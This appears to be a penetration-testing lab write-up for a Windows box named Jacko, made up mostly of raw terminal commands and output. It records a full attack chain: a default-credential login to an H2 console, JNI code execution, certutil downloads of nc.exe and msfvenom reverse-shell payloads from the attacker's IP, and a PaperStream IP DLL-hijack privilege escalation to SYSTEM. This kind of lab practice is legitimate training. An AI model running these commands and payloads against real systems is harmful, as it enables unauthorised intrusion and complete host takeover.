nmap scan
# Nmap 7.94 scan initiated Thu Oct 5 23:02:59 2023 as: nmap -sV -sC -oA jacko -Pn 192.168.180.66
Nmap scan report for 192.168.180.66
Host is up (0.28s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
8082/tcp open http H2 database http console
|_http-title: H2 Console
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-06T03:03:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Oct 5 23:04:26 2023 -- 1 IP address (1 host up) scanned in 87.60 seconds
checking two hanging fruit port 80 and 8082
http://192.168.180.66:8082/ gives us a H2 database engine with a log in and username "Sa". 192.168.180.66:80 just gives us a page with H2 database information
Checking google for H2 Database engine default creds. from stack overflow
name = "sa"
password = ""
Logging in with blank password and we are in
we can see that the version
jdbc:h2:~/test
INFORMATION_SCHEMA
Users
H2 1.4.199 (2019-03-13)
checking searchsploit
─$ searchsploit H2
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service (PoC) | windows/dos/48010.py
Adobe Flash - H264 File Stack Corruption | multiple/dos/39466.txt
Adobe Flash - H264 Parsing Out-of-Bounds Read | multiple/dos/39464.txt
Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery | hardware/webapps/26129.txt
freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service | linux/dos/31218.txt
Google Android - 'ih264d_process_intra_mb' Memory Corruption | android/dos/39651.txt
H2 Database - 'Alias' Arbitrary Code Execution | java/local/44422.py
H2 Database 1.4.196 - Remote Code Execution | java/webapps/45506.py
H2 Database 1.4.197 - Information Disclosure | linux/webapps/45105.py
H2 Database 1.4.199 - JNI Code Execution | java/local/49384.txt
H264WebCam - Boundary Condition Error | windows/dos/13920.c
H2O-CMS 3.4 - Insecure Cookie Handling | php/webapps/6862.txt
H2O-CMS 3.4 - PHP Code Injection / Cookie Authentication Bypass | php/webapps/32540.pl
H2O-CMS 3.4 - Remote Command Execution | php/webapps/6861.pl
Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities | php/webapps/31321.txt
Netgear SPH200D - Multiple Vulnerabilities | hardware/webapps/24441.txt
Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Local Privilege Escalation | solaris/local/20276.sh
Netscape iCal 2.1 Patch2 - iPlanet iCal 'iplncal.sh' Permissions | solaris/local/20275.sh
SSH2 3.0 - Restricted Shell Escape (Command Execution) | linux/local/21398.txt
SSH2 3.0 - Short Password Login | unix/remote/21021.pl
WebRTC - H264 NAL Packet Processing Type Confusion | multiple/dos/45123.txt
Windows 11 22h2 - Kernel Privilege Elevation | windows/local/51544.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcode Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Windows/x64 - Bind (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) | windows_x86-64/40981.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
╭─kali@kali ~/PG/jacko
╰─$ searchsploit -m java/local/49384.txt
Exploit: H2 Database 1.4.199 - JNI Code Execution
URL: https://www.exploit-db.com/exploits/49384
Path: /usr/share/exploitdb/exploits/java/local/49384.txt
Codes: N/A
Verified: True
File Type: ASCII text, with very long lines (64895)
Copied to: /home/kali/PG/jacko/49384.txt
Checking exploitdb and found the same verified exploit –> https://www.exploit-db.com/exploits/49384
After executing the three, we can find that it executes whoami in
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');
jacko\tony
Will create a reverse shell and then upload this to the machine and run it via certutil
will trty a reverse shell with netcat
╭─kali@kali ~/PG/jacko
╰─$ locate nc.exe
/home/kali/HTB/resolute/nc.exe
/usr/share/windows-resources/binaries/nc.exe
╭─kali@kali ~/PG/jacko
╰─$ cp /home/kali/HTB/resolute/nc.exe ~/exe
╭─kali@kali ~/PG/jacko
╰─$ cd ~/exe
╭─kali@kali ~/exe
╰─$ serve 80
Starting HTTP server on port 80...
====================================
certutil -urlcache -f http://192.168.45.236:80/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://192.168.45.236:80/file_to_download.txt -OutFile C:\path\lile.txt
====================================
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
we do it by running the two commands and we get a prompt
certutil -urlcache -split -f http://192.168.45.236:80/nc.exe c:/windows/temp/nc.exe
c:/windows/temp/nc.exe 192.168.45.236 8082 -e cmd.exe"
╭─kali@kali ~/exe
╰─$ serve 80
Starting HTTP server on port 80...
====================================
certutil -urlcache -f http://192.168.45.236:80/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://192.168.45.236:80/file_to_download.txt -OutFile C:\path\lile.txt
====================================
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.180.66 - - [06/Oct/2023 20:36:57] "GET /nc.exe HTTP/1.1" 200 -
192.168.180.66 - - [06/Oct/2023 20:36:58] "GET /nc.exe HTTP/1.1" 200 -
192.168.180.66 - - [06/Oct/2023 20:42:04] "GET /nc.exe HTTP/1.1" 200 -
192.168.180.66 - - [06/Oct/2023 20:42:05] "GET /nc.exe HTTP/1.1" 200 -
and
C:\Program Files (x86)\H2\service>^C
╭─kali@kali ~/exe
╰─$ rev 8082 1 ↵
Starting reverse shell listener on IP 192.168.45.236 and port 8082...
====================================
To upgrade a basic reverse shell (e.g., /bin/sh):
python -c 'import pty; pty.spawn("/bin/bash")'
====================================
listening on [any] 8082 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.66] 51507
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>
we will repeat the above with a proper shell
msfvenom
╭─kali@kali ~/exe
╰─$ cd ~/PG/jacko
╭─kali@kali ~/PG/jacko
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.236 LPORT=8082 EXITFUNC=thread -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
certutil -urlcache -split -f http://192.168.45.236:80/shell.exe c:/windows/temp/shell.exe
c:/windows/temp/shell.exe
we get a shell
Starting reverse shell listener on IP 192.168.45.236 and port 8082...
====================================
To upgrade a basic reverse shell (e.g., /bin/sh):
python -c 'import pty; pty.spawn("/bin/bash")'
====================================
listening on [any] 8082 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.66] 51544
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>
checking the directories in Program Files
Directory of C:\Program Files (x86)
04/27/2020 09:01 PM <DIR> .
04/27/2020 09:01 PM <DIR> ..
04/27/2020 08:59 PM <DIR> Common Files
04/27/2020 09:01 PM <DIR> fiScanner
04/27/2020 08:59 PM <DIR> H2
04/24/2020 09:50 AM <DIR> Internet Explorer
03/18/2019 09:52 PM <DIR> Microsoft.NET
04/27/2020 09:01 PM <DIR> PaperStream IP
03/18/2019 11:20 PM <DIR> Windows Defender
03/18/2019 09:52 PM <DIR> Windows Mail
04/24/2020 09:50 AM <DIR> Windows Media Player
03/18/2019 11:23 PM <DIR> Windows Multimedia Platform
03/18/2019 10:02 PM <DIR> Windows NT
03/18/2019 11:23 PM <DIR> Windows Photo Viewer
03/18/2019 11:23 PM <DIR> Windows Portable Devices
03/18/2019 09:52 PM <DIR> WindowsPowerShell
0 File(s) 0 bytes
16 Dir(s) 6,921,785,344 bytes free
C:\Program Files (x86)>
out of the norm is PaperStream IP so we check it out
enumarating to see if we can find version and we fine a readme file under TWAIN
Directory of C:\Program Files (x86)\PaperStream IP\TWAIN
04/27/2020 09:01 PM <DIR> .
04/27/2020 09:01 PM <DIR> ..
01/28/2016 11:22 AM 11,658 Licenseenu.rtf
04/27/2020 09:01 PM <DIR> Profile
07/11/2016 06:32 PM 3,241,739 PSIP0401.chm
07/07/2016 03:40 AM 3,315,469 PSIP0404.chm
07/06/2016 10:41 PM 3,479,268 PSIP0407.chm
07/04/2016 11:51 PM 3,544,174 PSIP0409.chm
07/12/2016 12:59 AM 3,449,511 PSIP040A.chm
07/07/2016 01:13 AM 3,424,734 PSIP040C.chm
07/06/2016 04:55 PM 3,412,543 PSIP0410.chm
06/21/2016 09:13 PM 3,868,867 PSIP0411.chm
07/05/2016 11:21 PM 3,177,961 PSIP0412.chm
07/12/2016 05:21 PM 3,406,701 PSIP0416.chm
07/07/2016 02:19 AM 3,396,546 PSIP0419.chm
07/06/2016 11:21 PM 3,394,699 PSIP041F.chm
07/06/2016 05:33 PM 3,353,423 PSIP0804.chm
07/04/2016 02:00 PM 17,990 readmeenu.rtf
15 File(s) 44,495,283 bytes
3 Dir(s) 6,921,469,952 bytes free
C:\Program Files (x86)\PaperStream IP\TWAIN>
opening the file we find version 1.42
C:\Program Files (x86)\PaperStream IP\TWAIN>type readmeenu.rtf
type readmeenu.rtf
{\rtf1\ansi\ansicpg932\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fnil\fcharset0 Microsoft Sans Serif;}{\f1\fswiss\fprq2\fcharset0 Microsoft Sans Serif;}}
{\colortbl ;\red0\green0\blue0;}
{\*\generator Msftedit 5.41.21.2510;}\viewkind4\uc1\pard\nowidctlpar\sl276\slmult1\f0\fs18 ---------------------------------------------------------------------------------------------------------\par
fi Series\par
PaperStream IP driver 1.42\par
README file\par
---------------------------------------------------------------------------------------------------------\par
Copyright PFU LIMITED 2013-2016\par
\par
\par
This file includes important notes on this product and also the additional information not included in the manuals.\par
\par
---------------------------------------------------------------------------------------------------------\par
Table of Contents\par
checking searchsploit
╰─$ searchsploit PaperStream IP
--------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------- ---------------------------------
PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation | windows/local/49382.ps1
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
╭─kali@kali ~/PG/jacko
╰─$
we checkout the powershell file and looks like we have to generate a dll called UninOldIS.dll with a reverse chell
msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.236 LPORT=8082 –platform=windows -f dll > UninOldIS.dll
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=8082 -f dll -o UninOldIS.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Saved as: UninOldIS.dll
╭─kali@kali ~/PG/jacko
upload both this and the shell script to the machine
certutil -urlcache -split -f http://192.168.45.236:80/UninOldIS.dl c:/windows/temp/UninOldIS.dll
certutil -urlcache -split -f http://192.168.45.236:80/49382.ps1 c:/windows/temp/49382.ps1
runing the scruipt via powershell
C:\Program Files (x86)\H2\service>cd C:\Windows\System32\WindowsPowerShell\v1.0
cd C:\Windows\System32\WindowsPowerShell\v1.0
C:\Windows\System32\WindowsPowerShell\v1.0>powershell.exe -ep bypass
powershell.exe -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\System32\WindowsPowerShell\v1.0> c:/windows/temp/49382.ps1 c:/windows/temp/UninOldIS.dll
c:/windows/temp/49382.ps1 c:/windows/temp/UninOldIS.dll
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...
Payload triggered
PS C:\Windows\System32\WindowsPowerShell\v1.0> cd c:/windows/temp/
cd c:/windows/temp/
PS C:\windows\temp> del UninOldIS.dll
del UninOldIS.dll
PS C:\windows\temp> Invoke-WebRequest -Uri http://192.168.45.236:80/UninOldIS.dll -OutFile c:\windows\temp\UninOldIS.dll
Invoke-WebRequest -Uri http://192.168.45.236:80/UninOldIS.dll -OutFile c:\windows\temp\UninOldIS.dll
PS C:\windows\temp> cd C:\Windows\System32\WindowsPowerShell\v1.0
cd C:\Windows\System32\WindowsPowerShell\v1.0
PS C:\Windows\System32\WindowsPowerShell\v1.0> c:/windows/temp/49382.ps1 c:/windows/temp/UninOldIS.dll
c:/windows/temp/49382.ps1 c:/windows/temp/UninOldIS.dll
Writable location found, copying payload to C:\JavaTemp\
and we get the reverse shell
─$ nc -nlvp 8082
listening on [any] 8082 ...
^C
╭─kali@kali ~/PG/jacko
╰─$ nc -nlvp 8082 1 ↵
listening on [any] 8082 ...
connect to [192.168.45.236] from (UNKNOWN) [192.168.180.66] 51903
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>